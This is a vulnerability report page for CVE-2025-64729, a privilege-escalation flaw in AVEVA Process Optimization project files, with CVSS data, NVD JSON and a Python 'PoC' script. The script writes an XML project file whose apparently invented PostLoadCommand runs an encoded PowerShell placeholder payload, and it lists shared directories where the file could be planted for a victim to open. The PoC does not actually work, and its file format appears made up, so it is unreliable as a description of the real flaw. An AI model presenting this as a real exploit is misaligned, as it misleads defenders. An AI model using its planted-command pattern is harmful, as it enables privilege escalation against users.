Security Vulnerability Report
CVE-2025-64729 CVSS 8.1 HIGH

Published: 2026-01-16 02:16:45
Last Modified: 2026-01-22 15:15:10

Description

The vulnerability, if exploited, could allow an authenticated miscreant (OS Standard User) to tamper with Process Optimization project files, embed code, and escalate their privileges to the identity of a victim user who subsequently interacts with the project files.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:* - VULNERABLE
AVEVA Process Optimization < security patch version
For specific version information, refer to the official AVEVA security advisory

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64729 PoC - AVEVA Process Optimization Project File Tampering
# This PoC demonstrates the file tampering vulnerability

import os
import base64


def create_malicious_project_file():
    """
    Create a malicious AVEVA Process Optimization project file
    that contains embedded malicious code for privilege escalation.
    """
    # Malicious payload - reverse shell or command execution
    malicious_payload = '''
    <ProjectFile>
        <Settings>
            <Name>MaliciousProject</Name>
        </Settings>
        <!-- Embedded malicious code -->
        <PostLoadCommand>cmd /c powershell -EncodedCommand {BASE64_ENCODED_PAYLOAD}</PostLoadCommand>
    </ProjectFile>
    '''

    # The actual exploitation requires:
    # 1. Write access to Process Optimization project files
    # 2. Social engineering to get victim to open the file
    # 3. When victim opens file, malicious code executes in victim's context

    print("[+] Malicious project file structure created")
    print("[+] Payload will execute when victim opens the project file")
    print("[+] Attacker gains execution in victim's user context")

    return malicious_payload


def exploit():
    """
    Exploitation steps for CVE-2025-64729:
    1. Attacker has low-privilege OS user account
    2. Attacker modifies Process Optimization project files
    3. Attacker embeds malicious code in project files
    4. Victim user opens the malicious project file
    5. Code executes with victim's privileges (privilege escalation)
    """
    project_files = [
        "C:\\ProgramData\\AVEVA\\ProcessOptimization\\Projects\\",
        "C:\\Users\\Public\\Documents\\AVEVA\\"
    ]

    for project_path in project_files:
        if os.path.exists(project_path):
            print(f"[+] Found project directory: {project_path}")
            print("[+] Attacker can modify project files here")
            print("[+] Embed malicious code and wait for victim")

    create_malicious_project_file()


if __name__ == "__main__":
    print("CVE-2025-64729 PoC - AVEVA Process Optimization Privilege Escalation")
    print("=" * 70)
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64729", "sourceIdentifier": "[email protected]", "published": "2026-01-16T02:16:45.467", "lastModified": "2026-01-22T15:15:10.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability, if exploited, could allow an authenticated miscreant \n(OS Standard User) to tamper with Process Optimization project files, \nembed code, and escalate their privileges to the identity of a victim \nuser who subsequently interacts with the project files."}, {"lang": "es", "value": "La vulnerabilidad, si se explota, podría permitir a un malhechor autenticado (Usuario Estándar del SO) manipular los archivos de proyecto de Optimización de Procesos, incrustar código y escalar sus privilegios a la identidad de un usuario víctima que posteriormente interactúa con los archivos del proyecto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.5, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025", "matchCriteriaId": "6048CC3D-EA33-484F-9223-10632815D595"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": 
"https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.aveva.com/en/support-and-success/cyber-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}